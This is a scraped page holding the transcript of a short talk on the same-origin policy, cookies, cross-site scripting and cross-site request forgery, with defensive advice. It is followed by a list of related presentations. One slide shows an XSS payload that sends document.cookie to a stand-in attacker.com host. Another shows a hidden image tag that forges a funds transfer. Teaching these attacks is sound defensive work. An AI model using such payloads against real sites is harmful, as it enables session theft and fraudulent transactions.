Presentation is loading. Please wait.

Presentation is loading. Please wait.

Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions.

Published byMagdalen Berry Modified over 8 years ago

Similar presentations

Presentation on theme: "Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions."— Presentation transcript:

1 Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions

2 What is the “Same-Origin Policy”? That a document or script loaded from one Web origin may not manipulate properties of, or communicate with, a document loaded from another Web origin. Server-side security enforced by a client (Web browser!) Scheme, host and port are considered a unique origin Doesn’t restrict a document from having HTML elements which call items from other origins (, ) Everyone wants to break it (see, JSONP, CORS)

3 Why same-origin policy? Netscape 2.0 implemented cookies HTTP Authentication Cookies created a session state mechanism for HTTP HTTP authentication created a login session state for HTTP One site can cause this state to be sent to another site

4 Problems with same-origin policy Impersonation of a legitimate user (via cookie, HTTP credentials) Impersonation of a legitimate site (by Referer HTTP header, for example) Leading to... Cross-site scripting Cross-site request forgery …and generally bad things for the user, victim site

5 Cross-site scripting Web app code: (String) page += " 〈 input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "' 〉 ”; Attacker changes “CC” value to: ' 〉〈 script 〉 document.location= 'http://www.attacker.com/cgi- bin/cookie.cgi?foo='+document.cookie 〈 /script 〉 '. All your session are belong to us!!!

6 Cross-site Request Forgery Victim site has a public state-changing URL: http://example.com/app/transferFunds?amount=1500&destinationAccount =4673243243 Attacker makes a call to that URL inside an innocuous image load: 〈 img src="http://example.com/app/transferFunds?amount=1500&destinationAc count=attackersAcct#“ width="0" height="0" / 〉 All yr money are belong to us!!!

7 Some solutions Never, ever trust a client! Don’t rely solely on cookies or the Referer HTTP header for authentication (for example, use CSRF tokens) Validate input supplied by the requesting user/site Encode input supplied by a requesting user/site Don’t write your own code (use OWASP ESAPI where possible!)

8 More attacks, more information SOP - http://taossa.com/index.php/2007/02/08/same-origin-policy/http://taossa.com/index.php/2007/02/08/same-origin-policy/ CORS, UMP, XHR - http://www.w3.org/2001/tag/2010/06/01-cross- domain.htmlhttp://www.w3.org/2001/tag/2010/06/01-cross- domain.html OWASP – http://www.owasp.orghttp://www.owasp.org OWASP Top 10 - http://www.owasp.org/index.php/Top_10_2010-Mainhttp://www.owasp.org/index.php/Top_10_2010-Main OWASP ESAPI - http://owasp-esapi-java.googlecode.comhttp://owasp-esapi-java.googlecode.com

Download ppt "Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
Bypassing Client-Side Protection CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Bypassing Client-Side Protection CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.

17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Workshop 3 Web Application Security Li Weichao March 14 2014.

Workshop 3 Web Application Security Li Weichao March
Cookies Cross site scripting

Cookies Cross site scripting
OWASP Zed Attack Proxy Project Lead

OWASP Zed Attack Proxy Project Lead
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
CSCD 303 Essential Computer Security Winter 2014 Lecture 12 – XSS, SQL Injection and CRSF Reading: See links - End of Slides.

CSCD 303 Essential Computer Security Winter 2014 Lecture 12 – XSS, SQL Injection and CRSF Reading: See links - End of Slides.
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.

Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.
Comp2513 Forms and CGI Server Applications Daniel L. Silver, Ph.D.

Comp2513 Forms and CGI Server Applications Daniel L. Silver, Ph.D.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Similar presentations

Ads by Google